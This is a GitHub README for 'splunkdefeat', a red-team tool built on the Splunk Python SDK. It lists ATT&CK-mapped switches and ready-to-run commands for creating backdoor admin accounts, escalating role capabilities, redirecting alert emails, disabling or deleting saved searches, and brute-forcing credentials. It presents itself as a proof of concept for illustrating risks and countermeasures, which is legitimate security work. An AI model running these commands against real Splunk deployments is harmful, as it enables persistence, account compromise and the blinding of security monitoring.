Skip to content

Latest commit

 

History

History
124 lines (76 loc) · 6.89 KB

README.md

File metadata and controls

124 lines (76 loc) · 6.89 KB

About splunkdefeat

splunkdefeat is a Splunk Enterprise SDK for Python wrapper to help red teamers conduct multiple attack techniques against Splunk. The motivation for this proof-of-concept tool was to illustrate practical attacks against Splunk, the associated risks, and how defenders can implement countermeasures. The author assumes no liability for use of this tool.

A more detailed write-up can be found here: splunkdefeat — A Splunk SDK wrapper for red teams

Installation

Clone the repository:

git clone [email protected]:markernest0/splunkdefeat.git

Python Dependencies

splunkdefeat depends on the python-dotenv, prettytable and splunk-sdk python modules.

Install the python dependencies:

pip install -r requirements.txt

Usage

Short Form Long Form Description Tactic Technique Sub-Technique
-h --help show this help message and exit - - -
-au --add_user Enter the username to create Persistence Create Account Cloud Account
-ap --assign_password Enter the password of the new user Persistence Create Account Cloud Account
-ar --assign_role Specify the role of the new user (default choice is admin). Choices: {admin,power,user} Persistence Create Account Cloud Account
-ur --update_role Specify the role to update with a capability. Choices: {admin,power,user} Persistence Account Manipulation Additional Cloud Roles
-uc --update_capability Specify the capability to add to a role. Choices: {admin_all_objects, schedule_search, edit_user,mdelete_by_keyword, all} Persistence Account Manipulation Additional Cloud Roles
-ue --update_email Enter the new email address for alerts Defense Evasion Impair Defenses Disable or Modify Tools
-ds --disable_searches Disable all searches Defense Evasion Impair Defenses Disable or Modify Tools
-es --enable_searches Enable all searches Defense Evasion Impair Defenses Disable or Modify Tools
-sh --splunk_host Domain name or IP address to enumerate Credential Access Brute Force -
-sp --splunk_port Connect to the host on the tcp port. default=8089 Credential Access Brute Force -
-su --splunk_user Specify the username Credential Access Brute Force -
-sf --password_file Specify the use of a password file Credential Access Brute Force -
-lu --list_user List current user Discovery Account Discovery Cloud Account
-la --list_all List all users Discovery Account Discovery Cloud Account
-lr --list_roles List all roles Discovery Permission Groups Discovery Cloud Groups
-ls --list_searches List all searches Discovery Cloud Service Discovery -
-ss --save_searches Save all searches locally Exfiltration Automated Exfiltration -
-du --delete_user Delete a specific user Impact Account Access Removal -
-rs --delete_searches Delete all searches Impact Data Destruction -
-ms --manipulate_searches Manipulate all searches Impact Stored Data Manipulation -

Examples

  • To list all the options and switches use the -h switch:

python splunkdefeat.py -h

PERSISTENCE

  • Create a new user use the -au, -ap, and -ar switches:

python splunkdefeat.py -au splunk-replicate -ap mypassword123 -ar admin

  • Modify a role with additional capabilities

python splunkdefeat.py -ur admin -uc delete_by_keyword

DEFENSE EVASION

  • Update the email for all search alert actions

python splunkdefeat.py -ue [email protected]

  • Disable all searches

python splunkdefeat.py -ds

  • Enable all searches

python splunkdefeat.py -es

CREDENTIAL ACCESS

  • Brute force a user

python splunkdefeat.py -sh splunk.example.com -sp 8089 -su sc_admin -sf

DISCOVERY

  • List current user and role

python splunkdefeat.py -lu

  • List all users and roles

python splunkdefeat.py -la

  • List all roles and capabilities

python splunkdefeat.py -lr

  • List all searches

python splunkdefeat.py -ls

EXFILTRATION

  • Download all saved searches locally

python splunkdefeat.py -ss

IMPACT

  • Delete a user

python splunkdefeat.py -du user_a

  • Delete all searches

python splunkdefeat.py -rs

  • Manipulate all searches

python splunkdefeat.py -ms